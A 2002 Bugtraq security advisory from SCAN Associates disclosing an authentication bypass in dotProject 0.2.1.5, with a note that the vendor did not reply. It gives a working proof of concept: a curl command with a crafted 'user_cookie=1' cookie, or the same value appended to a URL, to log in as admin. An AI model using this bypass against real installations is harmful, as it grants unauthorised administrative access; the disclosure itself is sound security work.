[26383] in bugtraq
php dotProject by pass authentication
daemon@ATHENA.MIT.EDU (pokleyzz)
Mon Jul 29 15:12:40 2002
Message-ID: <3D44B432.90103@scan-associates.net>
Date: Mon, 29 Jul 2002 11:19:14 +0800
From: pokleyzz <pokleyzz@scan-associates.net>
MIME-Version: 1.0
To: bugtraq <bugtraq@securityfocus.com>, sk <sk@scan-associates.net>,
Shaharil Abdul Malek <shaharil@scan-associates.net>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
SCAN Associates Sdn Bhd Security Advisory
Product: dotProject 0.2.1.5 (possibly other)
Vendor URL: http://www.dotmarketing.org/dotproject/
Summary: php dotProject by pass authentication
Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>,
shaharil <shaharil@scan-associates.net>
Description
===========
dotProject is web base project management system .
This application consider as beta version.
Details
=======
Everyone can bypass authentication and login as Admin.
It was rather simple to exploit, user may send a crafted cookie like:
curl -b user_cookie=1 http://server/project/index.php?m=projects
Or simply append user_cookie=1 in any URL:
http://server/project/index.php?m=projects&user_cookie=1
Vendor Response
===============
Vendor has been contacted on 24/7/2002 but no reply.
www.scan-associates.net <http://www.scan-associates.net>
